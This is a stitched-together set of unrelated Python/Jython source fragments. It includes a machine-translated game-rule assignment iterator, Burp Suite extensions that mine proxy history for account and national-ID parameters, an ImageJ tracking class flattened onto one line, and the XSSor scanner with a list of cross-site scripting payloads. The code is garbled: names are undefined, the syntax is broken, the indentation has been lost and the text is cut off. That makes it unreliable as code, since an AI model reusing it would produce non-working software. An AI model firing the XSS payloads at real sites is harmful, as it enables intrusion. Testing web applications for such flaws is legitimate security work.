for v in varsToAssign:
if not newVarsToAssign.contains(v):
newVarsToAssign.add(v)
self.varsToAssign = newVarsToAssign
self.varsToAssign.removeAll(headAssignment.keySet())
# varsToAssign is set at this point
# We see if iterating over entire tuples will give us a
# better result, and we look for the best way of doing that.
# Let's get the domains of the variables
# Map<GdlVariable, Set<GdlConstant>> varDomains = model.getVarDomains(rule);
# Since we're looking at a particular rule, we can do this one step better
# by looking at the domain of the head, which may be more restrictive
# and taking the intersections of the two domains where applicable
# Map<GdlVariable, Set<GdlConstant>> headVarDomains = model.getVarDomainsInSentence(rule.getHead());
# We can run the A* search for a good set of source conjuncts
# at this point, then use the result to build the rest.
completedSentenceFormSizes = HashMap()
if completedSentenceFormValues != None:
for form in completedSentenceFormValues.keySet():
completedSentenceFormSizes.put(form, completedSentenceFormValues.get(form).size())
varDomainSizes = HashMap()
for var in varDomains.keySet():
varDomainSizes.put(var, varDomains.get(var).size())
bestOrdering = IterationOrderCandidate()
bestOrdering = getBestIterationOrderCandidate(rule, varDomains, functionInfoMap, completedSentenceFormSizes, headAssignment, False)# model,
# TODO: True here?
# Want to replace next few things with order
# Need a few extra things to handle the use of iteration over existing tuples
self.varsToAssign = bestOrdering.getVariableOrdering()
# For each of these vars, we have to find one or the other.
# Let's start by finding all the domains, a task already done.
self.valuesToIterate = Lists.newArrayListWithCapacity(len(self.varsToAssign))
for var in varsToAssign:
if varDomains.containsKey(var):
if not varDomains.get(var).isEmpty():
self.valuesToIterate.add(ImmutableList.copyOf(varDomains.get(var)))
else:
self.valuesToIterate.add(ImmutableList.of(GdlPool.getConstant("0")))
else:
self.valuesToIterate.add(ImmutableList.of(GdlPool.getConstant("0")))
# Okay, the iteration-over-domain is done.
# Now let's look at sourced iteration.
self.sourceDefiningSlot = ArrayList(len(self.varsToAssign))
i = 0
while i < len(self.varsToAssign):
self.sourceDefiningSlot.add(-1)
i += 1
# We also need to convert values into tuples
# We should do so while constraining to any constants in the conjunct
# Let's convert the conjuncts
sourceConjuncts = bestOrdering.getSourceConjuncts()
self.tuplesBySource = Lists.newArrayListWithCapacity(len(sourceConjuncts))
# new ArrayList<List<List<GdlConstant>>>(len(sourceConjuncts));
self.varsChosenBySource = Lists.newArrayListWithCapacity(len(sourceConjuncts))
# new ArrayList<List<Integer>>(len(sourceConjuncts));
self.putDontCheckBySource = Lists.newArrayListWithCapacity(len(sourceConjuncts))
# new ArrayList<List<Boolean>>(len(sourceConjuncts));
j = 0
while j < len(sourceConjuncts):
# flatten into a tuple
# Go through the vars/constants in the tuple
while i < len(conjunctTuple):
if isinstance(term, (GdlConstant, )):
constraintSlots.add(i)
constraintValues.add(term)
# TODO: What if tuple size ends up being 0?
# Need to keep that in mind
elif isinstance(term, (GdlVariable, )):
varsChosen.add(varIndex)
if self.sourceDefiningSlot.get(varIndex) == -1:
# We define it
self.sourceDefiningSlot.set(varIndex, j)
putDontCheck.add(True)
else:
# It's an overlap; we just check for consistency
putDontCheck.add(False)
else:
raise RuntimeException("Function returned in tuple")
i += 1
self.varsChosenBySource.add(ImmutableList.copyOf(varsChosen))
self.putDontCheckBySource.add(ImmutableList.copyOf(putDontCheck))
# Now we put the tuples together
# We use constraintSlots and constraintValues to check that the
# tuples have compatible values
for sentence in sentences:
# Check that it doesn't conflict with our headAssignment
if not headAssignment.isEmpty():
for var in headAssignment.keySet():
if tupleAssignment.containsKey(var) and tupleAssignment.get(var) != headAssignment.get(var):
continue
while c < len(constraintSlots):
if not longTuple.get(slot) == value:
continue
c += 1
while s < len(longTuple):
# constraintSlots is sorted in ascending order
if c < len(constraintSlots) and constraintSlots.get(c) == s:
c += 1
else:
shortTuple.add(longTuple.get(s))
s += 1
# The tuple fits the source conjunct
tuples.add(ImmutableList.copyOf(shortTuple))
# sortTuples(tuples); //Needed? Useful? Not sure. Probably not?
self.tuplesBySource.add(ImmutableList.copyOf(tuples))
j += 1
# We now want to see which we can give assignment functions to
self.valuesToCompute = ArrayList(len(self.varsToAssign))
for var in varsToAssign:
self.valuesToCompute.add(None)
self.indicesToChangeWhenNull = ArrayList(len(self.varsToAssign))
i = 0
while i < len(self.varsToAssign):
# Change itself, why not?
# Actually, instead let's try -1, to catch bugs better
self.indicesToChangeWhenNull.add(-1)
i += 1
# Now we have our functions already selected by the ordering
# bestOrdering.functionalConjunctIndices;
# Make AssignmentFunctions out of the ordering
functionalConjuncts = bestOrdering.getFunctionalConjuncts()
# print "functionalConjuncts: " + functionalConjuncts;
i = 0
while i < len(functionalConjuncts):
if functionalConjunct != None:
# These are the only ones that could be constant functions
if functionInfoMap != None:
functionInfo = functionInfoMap.get(conjForm)
if functionInfo != None:
# Now we need to figure out which variables are involved
# and which are suitable as functional outputs.
# 1) Which vars are in this conjunct?
# 2) Of these vars, which is "rightmost"?
# 3) Is it only used once in the relation?
if Collections.frequency(varsInSentence, rightmostVar) != 1:
continue
# Can't use it
# 4) Which slot is it used in in the relation?
# 5) Build an AssignmentFunction if appropriate.
# This should be able to translate from values of
# the other variables to the value of the wanted
# variable.
# We don't guarantee that this works until we check
if not function_.functional():
continue
self.valuesToCompute.set(index, function_)
remainingVarsInSentence.remove(rightmostVar)
self.indicesToChangeWhenNull.set(index, self.varsToAssign.indexOf(nextRightmostVar))
i += 1
# We now have the remainingVars also assigned their domains
# We also cover the distincts here
# Assume these are just variables and constants
self.distincts = ArrayList()
for literal in rule.getBody():
if isinstance(literal, (GdlDistinct, )):
self.distincts.add(literal)
computeVarsToChangePerDistinct()
# Need to add "distinct" restrictions to head assignment, too...
checkDistinctsAgainstHead()
# We are ready for iteration
# print "headAssignment: " + headAssignment;
# print "varsToAssign: " + varsToAssign;
# print "valuesToCompute: " + valuesToCompute;
# print "sourceDefiningSlot: " + sourceDefiningSlot;
def getRightmostVar(self, vars):
""" generated source for method getRightmostVar """
rightmostVar = None
for var in varsToAssign:
if vars.contains(var):
rightmostVar = var
return rightmostVar
@__init__.register(object)
def __init___0(self):
""" generated source for method __init___0 """
super(AssignmentsImpl, self).__init__()
# The assignment is impossible; return nothing
self.empty = True
@SuppressWarnings("unchecked")
@__init__.register(object, GdlRule, Map, Map, Map)
def __init___1(self, rule, varDomains, functionInfoMap, completedSentenceFormValues):
""" generated source for method __init___1 """
super(AssignmentsImpl, self).__init__()
# SentenceModel model,
self.__init__(Collections.EMPTY_MAP, rule, varDomains, functionInfoMap, completedSentenceFormValues)
def checkDistinctsAgainstHead(self):
""" generated source for method checkDistinctsAgainstHead """
for distinct in distincts:
if term1 == term2:
# This fails
self.empty = True
self.allDone = True
def iterator(self):
""" generated source for method iterator """
return AssignmentIteratorImpl(getPlan())
def getIterator(self):
""" generated source for method getIterator """
return AssignmentIteratorImpl(getPlan())
def getPlan(self):
""" generated source for method getPlan """
return AssignmentIterationPlan.create(self.varsToAssign, self.tuplesBySource, self.headAssignment, self.indicesToChangeWhenNull, self.distincts, self.varsToChangePerDistinct, self.valuesToCompute, self.sourceDefiningSlot, self.valuesToIterate, self.varsChosenBySource, self.putDontCheckBySource, self.empty, self.allDone)
def computeVarsToChangePerDistinct(self):
""" generated source for method computeVarsToChangePerDistinct """
# remember that iterators must be set up first
self.varsToChangePerDistinct = ArrayList(len(self.varsToAssign))
for distinct in distincts:
# For two vars, we want to record the later of the two
# For one var, we want to record the one
# For no vars, we just put null
if isinstance(, (GdlVariable, )):
varsInDistinct.add(distinct.getArg1())
if isinstance(, (GdlVariable, )):
varsInDistinct.add(distinct.getArg2())
if len(varsInDistinct) == 1:
varToChange = varsInDistinct.get(0)
elif len(varsInDistinct) == 2:
varToChange = self.getRightmostVar(varsInDistinct)
self.varsToChangePerDistinct.add(varToChange)
@classmethod
def getAssignmentsProducingSentence(cls, rule, sentence, varDomains, functionInfoMap, completedSentenceFormValues):
""" generated source for method getAssignmentsProducingSentence """
# SentenceModel model,
# First, we see which variables must be set according to the rule head
# (and see if there's any contradiction)
headAssignment = HashMap()
if not setVariablesInHead(rule.getHead(), sentence, headAssignment):
return AssignmentsImpl()
# Collections.emptySet();
# Then we come up with all the assignments of the rest of the variables
# We need to look for functions we can make use of
return AssignmentsImpl(headAssignment, rule, varDomains, functionInfoMap, completedSentenceFormValues)
# returns true if all variables were set successfully
@classmethod
@overloaded
def setVariablesInHead(cls, head, sentence, assignment):
""" generated source for method setVariablesInHead """
if isinstance(head, (GdlProposition, )):
return True
return cls.setVariablesInHead(head.getBody(), sentence.getBody(), assignment)
@classmethod
@setVariablesInHead.register(object, List, List, Map)
def setVariablesInHead_0(cls, head, sentence, assignment):
""" generated source for method setVariablesInHead_0 """
i = 0
while i < len(head):
if isinstance(headTerm, (GdlConstant, )):
if not refTerm == headTerm:
# The rule can't produce this sentence
return False
elif isinstance(headTerm, (GdlVariable, )):
if curValue != None and not curValue == refTerm:
# inconsistent assignment (e.g. head is (rel ?x ?x), sentence is (rel 1 2))
return False
assignment.put(var, refTerm)
elif isinstance(headTerm, (GdlFunction, )):
# Recurse on the body
if not cls.setVariablesInHead(headFunction.getBody(), refFunction.getBody(), assignment):
return False
i += 1
return True
#
# * Finds the iteration order (including variables, functions, and
# * source conjuncts) that is expected to result in the fastest iteration.
# *
# * The value that is compared for each ordering is the product of:
# * - For each source conjunct, the number of tuples offered by the conjunct;
# * - For each variable not defined by a function, the size of its domain.
# *
# * @param functionInfoMap
# * @param completedSentenceFormSizes For each sentence form, this may optionally
# * contain the number of possible sentences of this form. This is useful if the
# * number of sentences is much lower than the product of its variables' domain
# * sizes; however, if this contains sentence forms where the set of sentences
# * is unknown, then it may return an ordering that is unusable.
#
@classmethod
def getBestIterationOrderCandidate(cls, rule, varDomains, functionInfoMap, completedSentenceFormSizes, preassignment, analyticFunctionOrdering):
""" generated source for method getBestIterationOrderCandidate """
# SentenceModel model,
# Here are the things we need to pass into the first IOC constructor
sourceConjunctCandidates = ArrayList()
# What is a source conjunct candidate?
# - It is a positive conjunct in the rule (i.e. a GdlSentence in the body).
# - It has already been fully defined; i.e. it is not recursively defined in terms of the current form.
# Furthermore, we know the number of potentially true tuples in it.
varsToAssign = GdlUtils.getVariables(rule)
newVarsToAssign = ArrayList()
for var in varsToAssign:
if not newVarsToAssign.contains(var):
newVarsToAssign.add(var)
varsToAssign = newVarsToAssign
if preassignment != None:
varsToAssign.removeAll(preassignment.keySet())
# Calculate var domain sizes
varDomainSizes = getVarDomainSizes(varDomains)# rule, model
sourceConjunctSizes = ArrayList()
for conjunct in rule.getBody():
if isinstance(conjunct, (GdlRelation, )):
if completedSentenceFormSizes != None and completedSentenceFormSizes.containsKey(form):
# New: Don't add if it will be useless as a source
# For now, we take a strict definition of that
# Compare its size with the product of the domains
# of the variables it defines
# In the future, we could require a certain ratio
# to decide that this is worthwhile
for var in vars:
maxSize *= domainSize
if size >= maxSize:
continue
sourceConjunctCandidates.add(relation)
sourceConjunctSizes.add(size)
functionalSentences = ArrayList()
functionalSentencesInfo = ArrayList()
for conjunct in rule.getBody():
if isinstance(conjunct, (GdlSentence, )):
if functionInfoMap != None and functionInfoMap.containsKey(form):
functionalSentences.add(conjunct)
functionalSentencesInfo.add(functionInfoMap.get(form))
# TODO: If we have a head assignment, treat everything as already replaced
# Maybe just translate the rule? Or should we keep the pool clean?
emptyCandidate = IterationOrderCandidate(varsToAssign, sourceConjunctCandidates, sourceConjunctSizes, functionalSentences, functionalSentencesInfo, varDomainSizes)
searchQueue = PriorityQueue()
searchQueue.add(emptyCandidate)
while not searchQueue.isEmpty():
# print "Node being checked out: " + curNode;
if curNode.isComplete():
# This is the complete ordering with the lowest heuristic value
return curNode
searchQueue.addAll(curNode.getChildren(analyticFunctionOrdering))
raise RuntimeException("Found no complete iteration orderings")
@classmethod
def getVarDomainSizes(cls, varDomains):
""" generated source for method getVarDomainSizes """
# GdlRule rule,
# SentenceModel model
varDomainSizes = HashMap()
# Map<GdlVariable, Set<GdlConstant>> varDomains = model.getVarDomains(rule);
for var in varDomains.keySet():
varDomainSizes.put(var, varDomains.get(var).size())
return varDomainSizes
@classmethod
def getNumAssignmentsEstimate(cls, rule, varDomains, checker):
""" generated source for method getNumAssignmentsEstimate """
# First we need the best iteration order
# Arguments we'll need to pass in:
# - A SentenceModel
# - constant forms
# - completed sentence form sizes
# - Variable domain sizes?
functionInfoMap = HashMap()
for form in checker.getConstantSentenceForms():
functionInfoMap.put(form, FunctionInfoImpl.create(form, checker))
# Populate variable domain sizes using the constant checker
domainSizes = HashMap()
for form in checker.getConstantSentenceForms():
domainSizes.put(form, checker.getTrueSentences(form).size())
# TODO: Propagate these domain sizes as estimates for other rules?
# Look for literals in the body of the rule and their ancestors?
# Could we possibly do this elsewhere?
ordering = cls.getBestIterationOrderCandidate(rule, varDomains, functionInfoMap, None, None, True)# model,
return ordering.getHeuristicValue()
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def __init__(self):
self._callbacks = ''
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("CrownJewelFinder")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
self.configSplitPane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
label1 = JLabel("Burp State File")
panel1 = JPanel()
panel1.add(label1)
self.textfield1 = JTextField('Provide Burp State File Path... ',15)
panel1.add(self.textfield1)
self.loadFileButton = JButton('Load File',actionPerformed=self.LoadFile)
panel1.add(self.loadFileButton)
self.configSplitPane.setLeftComponent(panel1);
# customize our UI components
callbacks.customizeUiComponent(self.configSplitPane)
callbacks.customizeUiComponent(panel1)
#Compile RegEx Patterns
regex = "[A-Z0-9]{5,20}"
self.myre = re.compile(regex, re.DOTALL)
# restore burp state
self.file = ''
#file = java.io.File('E:/Projects/CPF/Burp-States-Dump/Iteration3-1June2015/172.24.101.42/2015.06.01_08.17.burp')
#print file.__class__
#print file.exists()
#callbacks.restoreState(file)
#get Request/Response from history
#reqres = callbacks.getProxyHistory()
#print len(reqres)
#self.RetrievInterestingRequests(callbacks, reqres)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
self.doInterestingThings()
#self.fileInput()
return
def doInterestingThings(self):
file = java.io.File('E:/Projects/CPF/Burp-States-Dump/Iteration3-1June2015/172.24.101.42/2015.06.01_08.17.burp')
#print file.__class__
#print file.exists()
self._callbacks.restoreState(file)
#get Request/Response from history
reqres = self._callbacks.getProxyHistory()
print len(reqres)
#self.RetrievInterestingRequests(self._callbacks, reqres)
def fileInput(self):
frame = JFrame("Enter File Path")
frame.setSize(600, 200)
frame.setDefaultCloseOperation(WindowConstants.EXIT_ON_CLOSE)
pnl = JPanel()
frame.add(pnl)
self.textfield1 = JTextField('Provide Burp State File Path... ',15)
pnl.add(self.textfield1)
#self.textfield2 = JTextField('and click Copy', 15)
#pnl.add(self.textfield2)
copyButton = JButton('Load File',actionPerformed=self.LoadFile)
pnl.add(copyButton)
frame.pack()
frame.setVisible(True)
return
def LoadFile(self, event):
self.doInterestingThings()
def getTabCaption(self):
return "Tamperable Parameters"
#
# implement ITab
#
def RetrievInterestingRequests(self, callbacks, reqres):
f = open('temp.txt','w')
for index, r in enumerate(reqres):
url = callbacks.getHelpers().analyzeRequest(r.getHttpService(), r.getRequest()).getUrl()
#if callbacks.isInScope(url):
if True:
params = callbacks.getHelpers().analyzeRequest(r.getHttpService(), r.getRequest()).getParameters()
for param in params:
paramName = callbacks.getHelpers().urlDecode(param.getName())
paramVal = callbacks.getHelpers().urlDecode(param.getValue())
if (('cpfaccount' in paramName.lower()) or ('transactionnumber' in paramName.lower()) or ('nric' in paramName.lower())):
#regex = "[A-Z0-9]+{5,20}"
#myre = re.compile(regex, re.DOTALL)
match_vals = self.myre.findall(paramVal)
if match_vals > 0:
print str(url) + str(index+1)
f.write(str(url) +' : '+ str(index+1))
f.write("\n")
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(4, callbacks.saveBuffersToTempFiles(r), callbacks.getHelpers().analyzeRequest(r.getHttpService(), r.getRequest()).getUrl()))
self.fireTableRowsInserted(row, row)
self._lock.release()
f.close()
return
def getUiComponent(self):
return self._splitpane
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Tool"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._url.toString()
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
class Path: def __init__(self, pathid): self.pathid = pathid self.nucs = ArrayList() self.touchesEdge = False self.minbx = 0 self.minby = 0 self.maxbx = 0 self.maxby = 0 self.binstack = ImagePlus() self.rimstack = ImagePlus() self.actualbx = 0 self.actualby = 0 self.actualww = 0 self.actualhh = 0 def addNuc(self, nuc): self.nucs.add(nuc) def getNucs(self): return self.nucs def getPathID(self): return self.pathid def settouchesEdge(self, touches): self.touchesEdge = touches def clearOtherNucs(self, ip, wandx, wandy): wandx, wandy = int(wandx), int(wandy) if ip.getPixel(wandx, wandy) == 255: wan = Wand(ip) wan.autoOutline(wandx, wandy) #print "selected", wan.npoints roi = ShapeRoi(PolygonRoi(wan.xpoints , wan.ypoints, wan.npoints, Roi.FREEROI)) allroi = ShapeRoi(Roi(0,0, ip.getWidth(), ip.getHeight())) #imp.setRoi(roi.xor(allroi)) ip.setColor(0) ip.fill(roi.xor(allroi)) # imp.updateAndDraw() def extractSubStacks(self, imp, start, end, offset): self.actualbx = self.minbx - offset self.actualby = self.minby - offset if self.actualbx < 0: self.actualbx = 0 if self.actualby < 0: self.actualby = 0 self.actualww = self.maxbx-self.minbx + 2*offset if self.minbx + self.actualww > imp.getWidth()-1: self.actualww = imp.getWidth() - self.minbx -1 self.actualhh = self.maxby-self.minby + 2*offset if self.minby + self.actualhh > imp.getHeight()-1: self.actualhh = imp.getHeight() - self.minby -1 #imp.setRoi(self.minbx, self.minby, self.maxbx-self.minbx, self.maxby-self.minby) imp.setRoi(self.actualbx, self.actualby, self.actualww, self.actualhh) subimp = Duplicator().run(imp, int(start), int(end)) return subimp def defaultextractSubStacks(self, imp): start = self.nucs.get(0).frame end = self.nucs.get(len(self.nucs)-1).frame imp.setRoi(self.actualbx, self.actualby, self.actualww, self.actualhh) subimp = Duplicator().run(imp, int(start), int(end)) return subimp # returns a substack, for both ch1 and ch2 def getPathStack(self, imp, offset): start = self.nucs.get(0).frame end = self.nucs.get(len(self.nucs)-1).frame subimp = self.extractSubStacks(imp, start, end, offset) return subimp # returns a rim stack of ch2 def getRimSubStack(self, binimp, morphiter): subimp = self.getPathStack(binimp, morphiter + 15) # 15 is to have some more space at the edge for i in range(subimp.getStackSize()): wx = self.nucs.get(i).x - self.actualbx wy = self.nucs.get(i).y - self.actualby self.clearOtherNucs(subimp.getStack().getProcessor(i+1), wx , wy) rimimp = extractRIM(subimp, morphiter) return rimimp
class BurpExtender(IBurpExtender, ITab, IMessageEditorController,
AbstractTableModel, IContextMenuFactory):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, this_callbacks):
# stolen from activescan++
global callbacks, helpers
callbacks = this_callbacks
helpers = callbacks.getHelpers()
# keep a reference to our callbacks object
self._callbacks = this_callbacks
# obtain an extension helpers object
self._helpers = this_callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("ParamScraper")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self, self._helpers)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request With Scraped Parameters",
self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourself as a context menu...thing
callbacks.registerContextMenuFactory(self)
return
# stolen from https://github.com/NetSPI/Wsdler/blob/e4801a2925d47dcc309cdd178d860cabecc72933/src/main/java/burp/Menu.java
def createMenuItems(self, contextMenu):
menuList = ArrayList()
requestResponse = contextMenu.getSelectedMessages()[0]
mouseListener = CustomMouseListener(self,
self._helpers,
requestResponse)
item = JMenuItem("Scrape Parameters")
item.addMouseListener(mouseListener)
menuList.add(item)
return menuList
#
# implement ITab
#
def getTabCaption(self):
return "ParamScraper"
def getUiComponent(self):
return self._splitpane
def addLogEntry(self, messageInfo):
# create a new log entry with the message details
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry("Processing...", self._callbacks.saveBuffersToTempFiles(messageInfo), self._helpers.analyzeRequest(messageInfo).getUrl()))
self.fireTableRowsInserted(row, row)
self._lock.release()
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "# Scraped Parameters"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry.getExtraParamCount()
#return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._url.toString()
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel,
IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
# smart xss feature (print conclusion and observation)
# mark resulsts
# add automatic check pages in the same domain
self.tagPayloads = [
"<b>test", "<b onmouseover=test()>test",
"<img src=err onerror=test()>", "<script>test</script>"
"", "<scr ipt>test</scr ipt>", "<SCRIPT>test;</SCRIPT>",
"<scri<script>pt>test;</scr</script>ipt>",
"<SCRI<script>PT>test;</SCR</script>IPT>",
"<scri<scr<script>ipt>pt>test;</scr</sc</script>ript>ipt>",
"<IMG \"\"\"><SCRIPT>test</SCRIPT>\">",
"<IMG '''><SCRIPT>test</SCRIPT>'>", "<SCR%00IPT>test</SCR%00IPT>",
"<IFRAME SRC='f' onerror=\"test\"></IFRAME>",
"<IFRAME SRC='f' onerror='test'></IFRAME>",
"<<SCRIPT>test//<</SCRIPT>", "<img src=\"1\" onerror=\"test\">",
"<img src='1' onerror='test'",
"<STYLE TYPE=\"text/javascript\">test;</STYLE>",
"<<SCRIPT>test//<</SCRIPT>"
]
self.attributePayloads = [
"\"\"\"><SCRIPT>test", "'''><SCRIPT>test'",
"\"><script>test</script>", "\"><script>test</script><\"",
"'><script>test</script>", "'><script>test</script><'",
"\";test;\"", "';test;'", ";test;", "\";test;//",
"\"onmouseover=test ", "onerror=\"test\"", "onerror='test'",
"onload=\"test\"", "onload='test'"
]
self.xssKey = 'xssme'
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("XSSor")
self.affectedResponses = ArrayList()
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
clearAPListBtn = JButton("Clear List",
actionPerformed=self.clearAPList)
clearAPListBtn.setBounds(10, 85, 120, 30)
apListLabel = JLabel('Affected Pages List:')
apListLabel.setBounds(10, 10, 140, 30)
self.affectedModel = DefaultListModel()
self.affectedList = JList(self.affectedModel)
self.affectedList.addListSelectionListener(listSelectedChange(self))
scrollAList = JScrollPane(self.affectedList)
scrollAList.setVerticalScrollBarPolicy(
JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
scrollAList.setBounds(150, 10, 550, 200)
scrollAList.setBorder(LineBorder(Color.BLACK))
APtabs = JTabbedPane()
self._requestAPViewer = callbacks.createMessageEditor(self, False)
self._responseAPViewer = callbacks.createMessageEditor(self, False)
APtabs.addTab("Request", self._requestAPViewer.getComponent())
APtabs.addTab("Affeced Page Response",
self._responseAPViewer.getComponent())
APtabs.setBounds(0, 250, 700, 350)
APtabs.setSelectedIndex(1)
self.APpnl = JPanel()
self.APpnl.setBounds(0, 0, 1000, 1000)
self.APpnl.setLayout(None)
self.APpnl.add(scrollAList)
self.APpnl.add(clearAPListBtn)
self.APpnl.add(APtabs)
self.APpnl.add(apListLabel)
tabs.addTab("Affected Pages", self.APpnl)
self.intercept = 0
## init conf panel
startLabel = JLabel("Plugin status:")
startLabel.setBounds(10, 10, 140, 30)
payloadLabel = JLabel("Basic Payload:")
payloadLabel.setBounds(10, 50, 140, 30)
self.basicPayload = "<script>alert(1)</script>"
self.basicPayloadTxt = JTextArea(self.basicPayload, 5, 30)
self.basicPayloadTxt.setBounds(120, 50, 305, 30)
self.bruteForceMode = JCheckBox("Brute Force Mode")
self.bruteForceMode.setBounds(120, 80, 300, 30)
self.bruteForceMode.addItemListener(handleBFModeChange(self))
self.tagPayloadsCheck = JCheckBox("Tag paylods")
self.tagPayloadsCheck.setBounds(120, 100, 300, 30)
self.tagPayloadsCheck.setSelected(True)
self.tagPayloadsCheck.setEnabled(False)
self.tagPayloadsCheck.addItemListener(handleBFModeList(self))
self.attributePayloadsCheck = JCheckBox("Attribute payloads")
self.attributePayloadsCheck.setBounds(260, 100, 300, 30)
self.attributePayloadsCheck.setSelected(True)
self.attributePayloadsCheck.setEnabled(False)
self.attributePayloadsCheck.addItemListener(handleBFModeList(self))
payloadListLabel = JLabel("Payloads list (for BF mode):")
payloadListLabel.setBounds(10, 130, 140, 30)
self.payloadsModel = DefaultListModel()
self.payloadsList = JList(self.payloadsModel)
scrollPayloadsList = JScrollPane(self.payloadsList)
scrollPayloadsList.setVerticalScrollBarPolicy(
JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
scrollPayloadsList.setBounds(120, 170, 300, 200)
scrollPayloadsList.setBorder(LineBorder(
Color.BLACK)) # add buttons to remove payloads and add
for payload in self.tagPayloads:
self.payloadsModel.addElement(payload)
for payload in self.attributePayloads:
self.payloadsModel.addElement(payload)
self.startButton = JButton("XSSor is off",
actionPerformed=self.startOrStop)
self.startButton.setBounds(120, 10, 120, 30)
self.startButton.setBackground(Color(255, 100, 91, 255))
consoleTab = JTabbedPane()
self.consoleLog = JTextArea("", 5, 30)
scrollLog = JScrollPane(self.consoleLog)
scrollLog.setVerticalScrollBarPolicy(
JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
scrollLog.setBounds(120, 170, 550, 200)
scrollLog.setBorder(LineBorder(Color.BLACK))
scrollLog.getVerticalScrollBar().addAdjustmentListener(
autoScrollListener(self))
consoleTab.addTab("Console", scrollLog)
consoleTab.setBounds(0, 400, 500, 200)
self.pnl = JPanel()
self.pnl.setBounds(0, 0, 1000, 1000)
self.pnl.setLayout(None)
self.pnl.add(self.startButton)
self.pnl.add(startLabel)
self.pnl.add(payloadLabel)
self.pnl.add(self.basicPayloadTxt)
self.pnl.add(self.bruteForceMode)
self.pnl.add(payloadListLabel)
self.pnl.add(scrollPayloadsList)
self.pnl.add(self.attributePayloadsCheck)
self.pnl.add(self.tagPayloadsCheck)
self.pnl.add(consoleTab)
tabs.addTab("Configuration", self.pnl)
tabs.setSelectedIndex(3)
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
self._callbacks.registerContextMenuFactory(self)
print "Thank you for installing XSSor v0.1 extension"
print "Created by Barak Tawily"
print "\nGithub:\nhttps://github.com/Quitten/XSSor"
return
#
# implement ITab
#
def getTabCaption(self):
return "XSSor"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if self.intercept == 1:
if toolFlag == 4:
# only process requests
if not messageIsRequest:
self.checkForKey(messageInfo)
return
def printLog(self, message):
self.consoleLog.setText(self.consoleLog.getText() + '\r\n' + message)
def checkXSS(self, messageInfo, urlStr, requestBody, currentPayload):
self.printLog('trying exploit with the payload: ' + currentPayload)
requestURL = URL(urlStr.replace(self.xssKey, currentPayload))
requestBody = requestBody.replace(self.xssKey,
urllib.pathname2url(currentPayload))
httpService = self._helpers.buildHttpService(
str(requestURL.getHost()), int(requestURL.getPort()),
requestURL.getProtocol() == "https")
response = self._callbacks.makeHttpRequest(httpService, requestBody)
